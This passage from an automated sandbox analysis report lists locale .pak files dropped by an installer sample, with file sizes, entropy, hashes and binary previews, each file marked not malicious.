                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):581016
                                                                                                                                                                                            Entropy (8bit):5.296715563664076
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Mkqu5NjNJ2IU9UTx994eN7NgvESIqRRxsO1ytnvWjRT9Tj+rhazYDxrvAqpzSw9S:MkSLlZm128uJekfzEpe5kLISa
                                                                                                                                                                                            MD5:6AA3BC3EE4999C324B82E50940E62C74
                                                                                                                                                                                            SHA1:10AF8030FC2F875E133C9417E0221528160AD8B5
                                                                                                                                                                                            SHA-256:73CC8422643A65753B2C3672C8F8331EE92C9BDDC912576554E95B0986CF990D
                                                                                                                                                                                            SHA-512:F039EF32002E55D09A4F567CC81FE2B3B329D517C985436A5DA121FF0E6AC7E258B5D1FDDA81E6C1578DAF7078B91ABCFB7DA98CDBA6693D4FBE7F28115E6971
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.....l.!...n.)...o.....p.;...q.A...r.M...s.|...t.....v.....w.....y.....z.I...|.p...}...............................................................................".....;.....L...........u.................d...................................r...................................G............................._.......................v................._.................S..........." ....h ....y ..... ....9!....s!.....!.....!....`"....."....."....G#.....#.....$....,$.....$.....$.....%....$%....t%.....%.....%.....%....@&.....&.....&.....&....#'.....'.....'.....'....+(....~(.....(.....(.....)....Y).....).....).....)....-*....[*....d*.....*.....+....:+....E+.....+....,,....z,.....,.....,....6-...._-....x-.....-.....-.................................../...../...../..../0....l0.....0.....1....31....H1.....1.....1.....2....!2.....2.....3....Y3.....3.....4.....4.....4.....5.....5.....6....[6.....6.....7....r7.....7.....7....!8....a8.....8.....8.....9....c9.....9

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ja.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):708098
                                                                                                                                                                                            Entropy (8bit):5.712005061370792
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:SCG5Mw77QWN7v5DD79ZgQ21XymbA5zFLdbvVt:SrSw7NN7F9ZgQ21Xi5zFLdj
                                                                                                                                                                                            MD5:5A69547F56DC61E482DCDA1CE704C5AC
                                                                                                                                                                                            SHA1:5B7BBC8E9B14D78F2105136AFB7728050128C02E
                                                                                                                                                                                            SHA-256:A286A5FAF9021927EC09FD8CBF30ED14AD59C3BAA36D29E5491AD27B957915E5
                                                                                                                                                                                            SHA-512:2B9D020544201E2D0B0B44B0977FCBAB858563969CE02BE65689C5F5B780ADC4560DF523589293CD66F42903322ED61D781DA093ADFA44AA0681A28D97DE4556
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........'..e.f...h.n...i.y...j.....k.....l.....m.....o.....p.....q.....v.$...w.P...y.w...z.....|.....}.......&.....+.....3.....>.....F.....U.....Z.....b.....i.....p.....w.....y.....~.........................................l...................................p...........S.....n.....4...........P.....{...........k.......................|.................H............................. .....g.................h ..... ..... .....!.....!.....!.....!....6".....".....".....".....#....4$.....$.....$.....%....w%.....%.....%....;&.....&.....&.....'.....'....%(....l(.....(....4).....).... *....D*.....*....I+.....+.....+....#,.....,.....,.....,....j-.....-..........+...........6/...../...../....80.....0....(1....G1.....1....A2....{2.....2.....3.....3.....3.....3....Z4.....4.....5....35.....5....?6.....6.....6....*7.....7.....7.....7....B8.....8.....8.....9.....9.....9.....:....5:.....:....|;.....;.....;.....<.....=...._=.....=.....>.....>.....>.....>....z?.....?...."@....>@.....@....LA.....A.....A

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\kn.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1424056
                                                                                                                                                                                            Entropy (8bit):4.241400387342817
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:X3WMqESgQzb4OpsJHVLl6S3AE745LmWA4hqSm2G:Nqed65qWo
                                                                                                                                                                                            MD5:52A0707A70B939BCD75B0838A5DC5357
                                                                                                                                                                                            SHA1:EB9E1350D9D217580B1939302D008DC07C3B781C
                                                                                                                                                                                            SHA-256:B177EDA102B1BE8C53127E3BB47970A3C1E2032BE24900D8A126C5F0F077EF3D
                                                                                                                                                                                            SHA-512:D5FE69035338C4308F661FA0AC25C4A811A6014F6BD85CCC7AD947F76AECF76F67208512E1266E249EC067A5FB22FB74A3550B0F3AEB1BC50FADB3A9D3CC67E4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.B...h.J...i.[...j.g...k.v...l.....n.....o.....p.....q.....r.....s.....t.....v.(...w.T...y.{...z.....|.....}.......*...../.....7.....?.....G.....N.....U.....\.....].....^.....c.......................].............................D.....L...........[.................. ..... .....!....."....`#.....#....\$.....$....S%.....%....t&....='.....'.....'.....).....)....t*.....*....5,....D-..........|....../....V0.....0....%1....42.....3.....3.....3....,5....B6.....7....T7.....8.....9.....:....C;.....;....u<.....<.....<.....=....C>.....>.....>....X?.....?....A@....V@....9A.....A....zB.....B.....C....BD.....D.....D.....E....EF.....F.....F.....G....sH.....H.....I.....I.....J.....K....CK....eL....dM....$N....SN....6O.....O....TP.....P....AQ.....Q.....R..../R.....S.....S....1T....cT.....U....SV.....V....hW....PX.....X....UY.....Y.....Z.....[....*\....|\.....].....^....W_....._....+a.....b.....c.....c....;e....9f.....f....og.....h.....i....2j.....j....Lk.....k...._l.....l.....m.....n....`o

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ko.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):599188
                                                                                                                                                                                            Entropy (8bit):6.077314293748852
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:Twg3X8cvlA/t0ZTvIXzxMSAG0GlzRXhw3zTt8Onat7DXCqYwHs5Ra1i7vlq5zULq:TH75vKpCWj
                                                                                                                                                                                            MD5:4B563EB612D4FADC6BD8A4C918006AB1
                                                                                                                                                                                            SHA1:4B9E414AF0C044C4487D1439D23EF11B0169D308
                                                                                                                                                                                            SHA-256:E0D4461452607E0F4A619EFE653EC9EC39F7D34A742AE98374B2BCE0B821ADC9
                                                                                                                                                                                            SHA-512:B8C56D69FA41AD14F7197ACAB1BA987EBB06C5B15748E21CEC27861721545E30FB20F76F2C3A752C8EA94CCA1E6B4FAB7FB0727B679A8FB8E94DB2D5C028E7A6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........'..e.....h.....i.%...j.0...k.\...l.d...m.l...o.....p.....q.....r.....s.....t.....y.'...z.U...|.|...}.........................................................................+.....;.....N.....^...........Q.................(.......................[.................#.................5.....I.................<.....L.................?.....R.................B.....]...........;.....p.................?.....m.....z...........1.....].....j...........<.....t............ ..... ..... ..... ....P!.....!.....!.....!....0"....~".....".....".....#....Y#....~#.....#.....$....r$.....$.....$....3%.....%.....%.....%....>&.....&.....&.....&....E'.....'.....'.....'....B(.....(.....(.....(....`).....).....*..../*.....*.....*.....*.....+.....+.....+.....,.....,.....,.....,.....-.....-.....-..........L.....|............/...../....+/...../...../.....0....(0.....0.....0.....1....-1.....1....+2....q2.....2.....2....X3.....3.....3.....4....h4.....4.....4.....5....]5....}5.....5.....5....R6.....6.....6.....7

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\lt.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):644262
                                                                                                                                                                                            Entropy (8bit):5.6356477666035865
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:kjFt+0US0MAcrMqecJwuxZ5b7MjC3jqt6S0M:WFQ0GMnrLZ5sjIjqN
                                                                                                                                                                                            MD5:7CEF6E31D76861DB4D7D622FDD89E5AA
                                                                                                                                                                                            SHA1:31FA45C3B7666259D4D8A13518ECE423A97EDCCA
                                                                                                                                                                                            SHA-256:2F1E1C69DA5CAD8F47E45AF0AC47CEC90C20FE2897A43CB496C7FEED1EC5D1AB
                                                                                                                                                                                            SHA-512:DF66A739F3A8DA62A942B56B23F71A2B68469E87DC44EB8CE1A9A859A609F1DB4BEE2497DEFEF06FA48E14CF461E61410668A5216459C94C79F4B69A3CF092F6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.#...j./...k.>...l.I...n.Q...o.V...p.c...q.i...r.u...s.....t.....v.....w.....y.C...z.q...|.....}.................................................$.....%.....&.....(.....6.....C.....W.....h....................... ...........6.....}...........0.................$.................S.....m...........f.................$.......................w...........%.....J...........] ..... ..... ....5!.....!.....!.....!....j".....".....#.....#.....#....F$.....$.....$....7%.....%.....&....3&.....&.....'....<'....W'.....'....:(....j(....|(.....(....h).....).....)....(*.....*.....*.....*....m+.....+....',....6,.....,....4-....o-.....-............................6/...../...../...../.....0....%1....x1.....1.....2....|2.....2.....2....W3.....3.....4....<4.....4.....5....d5....|5.....6.....6.....6.....6....l7.....7.....7.....8.....8....19....s9.....9....$:.....:.....:.....;.....;....T<.....<.....<....G=.....=.....>....)>.....>....[?.....?.....?.....@....r@.....@.....@....+A.....A.....A

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\lv.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):643309
                                                                                                                                                                                            Entropy (8bit):5.637177021245093
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Uz9waCt7x2/28mvsf4xN3tVF89voxEJiiUh/7bOEw5hp1UrFeTE/CoCKbnh2Degl:UFuKvNMEGFOEw5WFeTunbf35S
                                                                                                                                                                                            MD5:00B517CE675A3089823708776C6F9302
                                                                                                                                                                                            SHA1:2BC24F150ADAAFD2604C5D95BBAAF8DC983D7DA2
                                                                                                                                                                                            SHA-256:0ADEDD1EAAF902FEEBB208220D9F21AE1B0175E74F6A966CD7ED226146D86AE8
                                                                                                                                                                                            SHA-512:6C19A0D779185141FB050369F9FBFE60D0B838E55E2674E3F14A67E1A6970727E329656E458CA8516A41C97B20E67EB1789587AF957129B3D32C94A3536AB12E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.L...h.T...i.e...j.q...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.2...w.^...y.....z.....|.....}.......4.....9.....A.....I.....Q.....X....._.....f.....g.....h.....j.....}.......................\...........k...................................\...........R.....o.............................:.......................j...........2.....D...........4.....f...........% ..... .....!....A!.....!....B".....".....".....#.....#.....#.....#...._$.....$....E%....b%.....%.....&.....&.....'....X'.....'.....'.....(....b(.....(.....(.....)....n).....).....*.....*.....*....0+....u+.....+.....+....p,.....,.....,.....-.....-.....-.....-....N............/...../...../.....0....G0....X0.....0.....1.....1.....1....K2.....2.....2.....2....`3.....3.....4....=4.....4.....5....15....@5.....5...._6.....6.....6....:7.....7.....7.....7....b8.....8.....9....39.....9....1:....u:.....:....+;.....;....P<....c<.....<....f=.....=.....=....5>.....>.....>.....?....o?.....?.....?.....@.....@....-A....qA

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ml.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1481376
                                                                                                                                                                                            Entropy (8bit):4.274098791777635
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:gtUOGVx75aWEyghv479y6DPnXKfhBP1zXnxooG98MF3e7hDK5V6jX9fb3VV:gtuxmGKfhBP1zX23F3ek5V6jX9D3j
                                                                                                                                                                                            MD5:D32A29A61E8AFABA6B42D236257D9929
                                                                                                                                                                                            SHA1:9664F50EA7590A47C2EB8EB4A3E49BE556D08F7A
                                                                                                                                                                                            SHA-256:A59FD15C969EE8FFD7E72F5A2245C6A5A4FC048F7899FCA489D78C8F6394CA1E
                                                                                                                                                                                            SHA-512:2668976853B26B22859F8C20AFAEB4D641845E94779B8994B49F240302420279E3F9A99666B8F551495B7D5A8C3C83609B7ECF276FABD8345CC8C787319EA3D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.@...h.H...i.Y...j.e...k.t...l.....n.....o.....p.....q.....r.....s.....t.....v.&...w.R...y.y...z.....|.....}.......(.....-.....5.....=.....E.....L.....S.....Z.....[.....\.....a.......................j...........<.....+.....x.................B.................] ....L!.....!.....".....#....h$.....$.....%....Y&.....&.....'.....'.....(....t).....).....*....n+.....+....4,.....-..........X/...../.....0.....1....W2.....2.....3.....4.... 5....d5.....6.....7....o8.....8....I:.....;.....<.....<.....=....U>.....>.....>.....?....g@.....@.....@.....A.....B.....B.....C.....C.....D....AE....uE....YF.....F....pG.....G.....H....YI.....I.....J.....J.....K....BL.....L....NM.....N.....N.....N.....O.....P.....Q.....Q.....R.....S.....T....DT.....U.....U.....U....?V.....W.....W.....X.....X.....Y.....Z.....[.....[.....\.....].....^....E^....g_....^`.....`....?a....~b....@c.....c....>d....le.....f....dg.....g.....h.....i.....j.....j.....l.....m.....m.....n.....n.....o....Pp.....p.....q.....r.....s

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\mr.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1222173
                                                                                                                                                                                            Entropy (8bit):4.300698800250203
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:gOG1c9CX6VI4KBYmiMpvVL8lownlWGrInbizwF/yGRu3RxYR3GodgEWYJrOznupW:fG0m4lwcasmKZKbzNvfq1E5imHReZ
                                                                                                                                                                                            MD5:0E5B29B6AE74A1F94CA4F880F131A79F
                                                                                                                                                                                            SHA1:6AC5089ACE05847480D2AEEC89954124CAA781AA
                                                                                                                                                                                            SHA-256:25BF8E86F7C9E88F68D4C40C4F124C16F60DAF22E7A87F55BA2C560A0F640BC9
                                                                                                                                                                                            SHA-512:30717C0AEF4458BBCF7472316727981829EDADA8BE3003AFD9D65CB01D4CF309F601B1C41539343D6239CB2E9157554C95CF966A4156458A2FD78D2464075C98
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........q(..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.C...t.Z...v.....w.....y.....z.....|.7...}.h...................................................................................-.....z.....................................................R...........U............ .....!....6"....b"....5#.....#....P$.....$....^%....-&.....&.....&.....'.....(.....)....T).....*.....,.....,....5-....S.....V/...../....$0....K1....K2.....2.....3....C4....a5.....6....J6.....7.....8.....9.....:.....;.....;....9<....s<....6=.....=....+>....W>.....?.....?.....?.....@.....A.....A....\B.....B....|C....RD.....D.....D.....E....uF.....F.....F.....G....uH.....H.....H.....I.....J.....J.....K....RL....{M....=N....|N....;O.....O....4P....]P.....P.....Q.....Q.....Q.....R.....S.....T....+T....TU....OV.....V....eW....OX.....Y....mY.....Y.....Z.....[....k\.....\.....].....^....n_....._.....`....Qb....:c....ac.....d.....e...._f.....f.....g.....h.....i....]i.....j.....j....Wk.....k.....l.....m....!n

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ms.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):554824
                                                                                                                                                                                            Entropy (8bit):5.250627975386066
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:1fZuPdEaPHdoDKUaxe+2cgFRlWWNxTUcWR95bxlqyGkuBm9ch:xg9HEsxd2hlWEG95vFG3
                                                                                                                                                                                            MD5:6149507C3AA99C4012D9D7CFE4BC30C8
                                                                                                                                                                                            SHA1:51A2BB5CBAE64F3877AFC342EA0F43915702F8F4
                                                                                                                                                                                            SHA-256:DD75481D67D9BE36ECB2E421117395FBB75B7623164F13A09BE1CF3CE76D588F
                                                                                                                                                                                            SHA-512:71F8DC03618D46BE7B036353526BF20A61E648EF50ADEEEC057D314E9A4536899C37EF691164BF9DE9E10A3867749F8D3D6F4038E16C82CF6122E7AB4A1C7732
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.^...h.f...i.n...j.z...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.;...w.g...y.....z.....|.....}.......=.....B.....J.....R.....Z.....a.....h.....o.....p.....q.....v.............................d...........4.....O.................B.....R...........0.....q.................^.......................f.......................[.......................`................./.......................P.......................- ..... ..... ..... .....!....y!.....!.....!....8".....".....#.....#...._#.....#.....#.....#....!$....t$.....$.....$.....$....G%....n%....z%.....%....A&....{&.....&.....&....I'....~'.....'.....'....?(....q(....{(.....(....-)....])....f).....).... *....S*....^*.....*....A+.....+.....+.....+....B,....g,.....,.....,...."-....F-....`-.....-.....-....(.....9................../....@/...../...../...../...../....U0.....0.....0.....0....e1.....1.....1.....2.....2.....3...._3....m3.....3....<4....w4.....4.....4....I5....w5.....5.....5.....6....;6....K6.....6.....6....&7

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\nb.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):537830
                                                                                                                                                                                            Entropy (8bit):5.4264919827777245
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:GFxHxFb73kroOp7fBpHXYbhOs5wk+bhPLgg5t:GXxFXkJ1YbhOs5f+bFUG
                                                                                                                                                                                            MD5:2A0EC73D03D4D7FCEC71AD66CC0D4B30
                                                                                                                                                                                            SHA1:BB8DF6E11B02086726ECEDE97D5F729F4197323C
                                                                                                                                                                                            SHA-256:D44EF5E644B1B8F7C056D5E20651515FCC8565BEFEC575091735FB39C6D63554
                                                                                                                                                                                            SHA-512:CDCB4E436270156E263D731CE243D821C5361B18B6D7B8259875C9D895301D478A87FEB7CAFC3376D09D18D27F32DC403FD2CBD034D68736CB968BBEFEBD642B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h. ...i.7...j.C...k.R...l.]...n.e...o.j...p.w...q.}...r.....s.....t.....v.....w.0...y.W...z.....|.....}...............................#.....*.....1.....8.....9.....:.....<.....G.....V.....i..................................._...................................n.................P.......................M.....w.................:.....c.....r...........B.....r.................w.................`...........- ....L ..... ....&!....^!....r!.....!....r"....."....."....m#.....#....J$....l$.....$.....%.....%....'%....}%.....%.....%.....&....`&.....&.....&.....&....I'.....'.....'.....(...._(.....(.....(.....(....a).....).....).....*...._*.....*.....*.....*....Q+.....+.....+.....+....`,.....,.....-....5-.....-.....-................x................../....[/...../...../...../....b0.....0.....1....F1.....1.....1.... 2....92.....2.....3....23....J3.....3.....4....J4....^4.....4....95....u5.....5.....6.....6.....6.....7....o7.....7.....7.....8....Y8.....8.....8.....8....<9.....9.....9

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\nl.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):556268
                                                                                                                                                                                            Entropy (8bit):5.362124110769206
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:jVAWY0lbJ9WQusFUiFgN5tmDdx5btfKzaWDZqqn9pmTy:qWY0lbJ9WQusFU15tmDdx5bFKzaWVqq1
                                                                                                                                                                                            MD5:E8B790166D701F63A60C3B322FCCE234
                                                                                                                                                                                            SHA1:61EC318AA8030F7D29C3258126B156D1D3EEFA2C
                                                                                                                                                                                            SHA-256:3D73B0110E5832B6A7C7B7E64018368464EF8552D6A98592D0ADBF713EB9755E
                                                                                                                                                                                            SHA-512:4E4B299CB55CBB5906FF974BB5E5078D2018298B5EE6D9CA0E40AAB8DB542AAEDC4BD7A5DB242A2C5194BC90C07631F627043DCC1A9F2D095A28C3E35F212DD9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k."...l.-...n.5...o.:...p.G...q.M...r.Y...s.....t.....v.....w.....y.'...z.U...|.|...}...............................................................................(.....9.....K...........m.................W.......................{...........3.....I.................L.....c.................7.....F.......................(.................7.....X...........0.....g.................E.....z.................T ..... ..... .....!.....!.....!.....!....[".....".....#....3#.....#.....#.....#.....$....X$.....$.....$.....$....,%....}%.....%.....%.....&....|&.....&.....&.....'....u'.....'.....'.....(....U(.....(.....(.....(....4)....`)....m).....)....)*....]*....l*.....*....H+.....+.....+.....,....W,.....,.....,.....,....=-....^-....u-.....-....+.....S.....e...........7/....n/...../...../....<0....Z0....n0.....0....21....d1....u1.....1....G2.....2.....2....-3.....3.....4.....4.....4.....5....D5....i5.....5....46....e6....z6.....6.....7....A7....Q7.....7.....8....A8

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\pl.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):619265
                                                                                                                                                                                            Entropy (8bit):5.770526396702215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:zifPIC1WoOB/ktv/XfQfuzSJY9HQbyDPSCUd4e3m7UyMgmx1QhH1b5FuH4VZy:YTxbMJ1Qh15w
                                                                                                                                                                                            MD5:8A4354163FF3B0978A568F781BDAC289
                                                                                                                                                                                            SHA1:45DE421F35AF79ADF962809CF8D0E6D2ADBCB553
                                                                                                                                                                                            SHA-256:2F6DE0F9A46AE0B75BEB67E09FFEEE12483842A7CD6F2A2382CCBE36FBFC17E3
                                                                                                                                                                                            SHA-512:5760F20228AFE74E9FF2A916A168E8CC2D4A64D8E76065E61A7A60616A473C7DC3DA4805125B270F179B7A0F291071E81D761D82EEC3B130D552B57ABD76C127
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i./...j.9...k.H...l.S...n.[...o.`...p.m...q.s...r.....s.....t.....v.....w.&...y.M...z.{...|.....}..................................... .....'.........../.....0.....2.....A.....O.....d.....y.........................................%.....8...........M.......................u................./.......................(.......................I...................................I.....n...........8 ....p ..... ..... ....M!.....!.....!.....".....".....".....".....#.....$....d$.....$.....$....$%....9%....Z%.....%.....%.....&....&&....o&.....&.....&.....&....O'.....'.....'.....'....](.....(.....(.....(....Y).....).....).....)....J*.....*.....*.....*....:+.....+.....+.....+....Q,.....,.....-....+-....y-.....-.....-.....-....Y.......................E/...../...../...../....g0.....0.....1....@1.....1.....1.....1.....2....s2.....2.....2.....3.....3.....3....+4....E4.....4....85.....5.....5....%6.....6.....6.....7....c7.....7.....7.....7....@8.....8.....8.....8....$9.....9.....9

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\pt-BR.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):581655
                                                                                                                                                                                            Entropy (8bit):5.426534241883623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:mHM4QhMCJi4wNNBXBLGfs9y+z5GHNXun0msRgMpI2:CchHi4wD50XosR9pN
                                                                                                                                                                                            MD5:B1AB7D7AA67A7B61BFA9AEBAD0B812AF
                                                                                                                                                                                            SHA1:95EFF4BE517C0A25C34578DEF10D48C77021DE1A
                                                                                                                                                                                            SHA-256:5BD503C413AAF8FA87FD47C341D437ACCC25397A50B082068BCF2F3BB4FB27C7
                                                                                                                                                                                            SHA-512:8498FE7727771DF3C1EB34560C1E25B0C30690C7C921104B4ADCF04CC5753462BAC513A60A5833CB6F57733201D4883605F8A4EC4A457F3EBC7C952090B1A9E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.-...j.9...k.H...l.S...n.[...o.`...p.m...q.s...r.....s.....t.....v.....w.&...y.M...z.{...|.....}..................................... .....'.........../.....0.....5.....G.....W.....y.............................%.................%.....5...........R.................4.......................6.............................r.................G.................'.................d................._ ..... ..... .....!....}!.....!.....!....J".....".....#....!#.....#....-$.....$.....$.....$....>%....d%....w%.....%.....&....d&....s&.....&....+'....`'....n'.....'....4(....o(.....(.....(....-)....^)....j).....).....*....:*....D*.....*.....*.....+.....+....}+.....+.....,....$,.....,.....-....q-.....-.....-....'.....K.....`................../....y/...../...../.....0.....0.....1....F1.....1.....1.....2....-2.....2.....2.....2.....3.....3.....3....(4....D4.....4....D5.....5.....5....A6.....6.....6....'7.....7.....7.....8.....8....e8.....8.....8.....8....`9.....9.....:....!:.....:

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\pt-PT.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):585544
                                                                                                                                                                                            Entropy (8bit):5.398721361990628
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:EdZCITRW+kQdJs7ieJVJJxhbHMm5wfBCV5z6jPdoSR7oF:6XJksvMV5+jPSSR7Y
                                                                                                                                                                                            MD5:CBE5E35F844F5F1400DF3685CC847694
                                                                                                                                                                                            SHA1:E60CDB0A813A97C8548C878276BFAE155350BB42
                                                                                                                                                                                            SHA-256:6B9BD714D217D596183894FFED3174A617E1C8CFAE292231D4B967183B589C6B
                                                                                                                                                                                            SHA-512:96046C97436A3DBF5AAC479B9EAA9DFDCFC81F1EDCAEE9CD65D59BEB0CE6B6B42828E0D170AAEF2EF1D68988F7916AC1DBAC0D84218DE83FEDCCA8592DE4C1F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.X...h.`...i.q...j.}...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.>...w.j...y.....z.....|.....}.......@.....E.....M.....U.....].....d.....k.....r.....s.....t.....y.............................U...........=.....Z...........%.....p...............................................8.....\.................).....9.........................................O.....}...........].................- ..... ..... ..... ....L!.....!.....!....."....i".....".....#....3#.....#....)$.....$.....$.....$....U%.....%.....%.....%....C&....t&.....&.....&....F'.....'.....'.....'....V(.....(.....(.....(....W).....).....).....)....:*....g*....q*.....*.....+....@+....J+.....+.....,....5,....F,.....,....$-....t-.....-.....-....4.....^.....z................../....$/...../...../.....0..../0.....0.....1....U1.....1.....1.....2....H2....Z2.....2.....3....>3....S3.....3.....4....b4....|4.....5.....5.....5.....5....u6.....6....,7....P7.....7....38....s8.....8.....8....'9....L9....a9.....9..../:....k:

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ro.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):606335
                                                                                                                                                                                            Entropy (8bit):5.4540537912984615
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:kxrPkiHXWrfGENd49ow6q0gdKXKkQGXq5e3jUZGs2hj/Xrbf:CrxXWr3Nu9o7qHKasq5ezUuj/3f
                                                                                                                                                                                            MD5:5DB10EDF772656C0808DD8DA698334BF
                                                                                                                                                                                            SHA1:3CAF7C9D5A3B44E06E0588DABA698B6970EA06F5
                                                                                                                                                                                            SHA-256:73B6A63352906D77196F38A1DF937EC0770160FB7A93321867C7994ED3E7967B
                                                                                                                                                                                            SHA-512:EB253B548C7F574943136764A23818F9DEDEA17FF42F92DC8591F4B7C297ACCDDE9F6B2C0AD96F1FD0815C53940C0102A90C603F9F4D6D9C8FB053B559CC7A62
                                                                                                                                                                                            Malicious:false
